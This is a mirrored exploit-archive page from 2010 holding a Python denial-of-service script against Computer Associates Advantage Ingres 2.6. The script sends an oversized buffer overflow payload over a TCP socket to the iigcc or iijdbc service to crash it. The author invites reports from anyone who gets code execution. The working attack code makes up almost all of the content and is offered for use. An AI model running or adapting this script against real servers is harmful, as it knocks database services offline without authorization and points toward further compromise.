Home / os / win7

Computer Associates Advantage Ingres 2.6 Denial of Service

Posted on 14 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Computer Associates Advantage Ingres 2.6 Denial of Service</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================================== Computer Associates Advantage Ingres 2.6 Denial of Service ========================================================== # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities # Date: 2010-08-14 # Author: fdisk # Version: 2.6 # Tested on: Windows 2003 Server SP1 en # CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338 # Notes: Fixed in the last version. # please let me know if you are/were able to get code execution &lt;rr dot fdisk at gmail dot com&gt; import socket import sys if len(sys.argv) != 4: print &quot;Usage: ./CAAdvantageDoS.py &lt;Target IP&gt; &lt;Port&gt; &lt;Service&gt;&quot; print &quot;Vulnerable Services: iigcc, iijdbc&quot; sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) service = sys.argv[3] if service == &quot;iigcc&quot;: payload = &quot;x41&quot; * 2106 elif service == &quot;iijdbc&quot;: payload = &quot;x41&quot; * 1066 else: print &quot;Vulnerable Services: iigcc, iijdbc&quot; sys.exit(1) payload += &quot;x42&quot; * 4 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print &quot;Sending payload&quot; s.send(payload) data = s.recv(1024) s.close() print 'Received', repr(data) print service + &quot; crashed&quot; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-14]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP